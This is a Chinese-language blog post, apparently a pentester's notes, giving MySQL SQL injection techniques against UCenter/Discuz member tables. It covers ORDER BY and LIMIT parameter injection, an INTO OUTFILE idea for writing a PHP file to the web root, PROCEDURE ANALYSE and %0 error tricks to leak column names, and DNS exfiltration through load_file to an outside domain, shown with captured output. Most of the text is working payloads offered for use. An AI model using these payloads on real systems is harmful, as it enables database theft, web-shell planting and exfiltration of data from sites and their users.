一、order by 的參數(shù)注入技巧：
兩種方法，思路都一樣。

example. “select username,password from uc_members order by”.$_GET['oderby']

a.常見的利用方法：
1.[SQL] select username,password from uc_members order by 1,If((select 1)=2,1,(select value from uc_settings));
返回錯(cuò)誤：[Err] 1242 - Subquery returns more than 1 row
2.[SQL] select username,password from uc_members order by 1,If((select 1)=1,1,(select value from uc_settings));
返回正常。

b.國外paper看到的方法：
1.[SQL] select username,password from uc_members order by 1,(select case when(2<1) then 1 else 1*(select username from uc_members)end)=1;
返回錯(cuò)誤：[Err] 1242 - Subquery returns more than 1 row
2.[SQL] select username,password from uc_members order by 1,(select case when(2>1) then 1 else 1*(select username from uc_members)end)=1;
返回正常。

二、limit 的參數(shù)注入技巧：

a.order by之后的limit參數(shù) 的注入，因?yàn)檎５膕ql語句order by后無法接union，所以沒有好辦法，就一個(gè)雞肋思路：into outfile '/www/root/xxx.php';

b.limit前無order by時(shí)的注入，那就方便多了，后面可以直接接union select ，隨便怎么注都行了：
select * from cdb_members limit 1 union select 1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7
這里還有個(gè)技巧，使用procedure analyse可以獲取字段名稱：
select * from cdb_members where uid=1 limit 1,1 procedure analyse()
不過procedure analyse同樣不能使用在order by之后：
[SQL] select * from cdb_members order by uid desc limit 1 procedure analyse()
[Err] 1386 - Can't use ORDER clause with this procedure

三、無法猜測字段時(shí)的技巧：

在mysql5以下版本或者information_schema 無法訪問的時(shí)候，無法猜到某個(gè)表的字段名，于是可以采用這個(gè)辦法，在子查詢中使用%0，報(bào)錯(cuò)獲得列名。以ucenter的uc_members為例。

1.猜測列數(shù)：SELECT 1 FROM `uc_members` where (SELECT * FROM `uc_members`)=(1)
返回錯(cuò)誤：#1241 - Operand should contain 12 column(s)
2.SELECT 1 FROM `uc_members` where (1,2,3,4,5,6,7,8,9,10,11,12)=(SELECT * FROM `uc_members` union select 1,2,3,4,5,6,7,8,9,10,11,12 limit 1)
返回正常。
3.SELECT 1 FROM `uc_members` where (1,2,3,4,5,6,7,8,9,10,11,12)=(SELECT * FROM `uc_members` union select 1%0,2,3,4,5,6,7,8,9,10,11,12 limit 1)
返回錯(cuò)誤：#1048 - Column 'uid' cannot be null
4.SELECT 1 FROM `uc_members` where (1,2,3,4,5,6,7,8,9,10,11,12)=(SELECT * FROM `uc_members` union select 1,2%0,3,4,5,6,7,8,9,10,11,12 limit 1)
返回錯(cuò)誤：#1048 - Column 'username' cannot be null
5. ……

注：5.1以上版本不適用，字段必須為非空（not null）

四、windows下利用dns解析盲注的技巧：

如果盲注很累，或者頁面無論and 1=1還是and 1=2的時(shí)候返回都一模一樣，這個(gè)時(shí)候利用dns進(jìn)行注入是個(gè)不錯(cuò)的方法，前提是win環(huán)境root權(quán)限下的mysql，利用load_file函數(shù)讀取遠(yuǎn)程文件的思路。本地搭建一個(gè)dns服務(wù)器，然后將特定域名的NS server轉(zhuǎn)過來。然后進(jìn)行注入，并抓包。

本地測試了下（實(shí)際注入中單引號可以編碼）：select load_file(concat('\\\\aaa1.',(select user()),'.oldjun.com\\a.txt'))，抓包成功獲得select的結(jié)果：
29 28.524843 192.168.9.107 192.168.1.2 DNS Standard query A aaa1.root@localhost.oldjun.com

如圖所示：

最新評論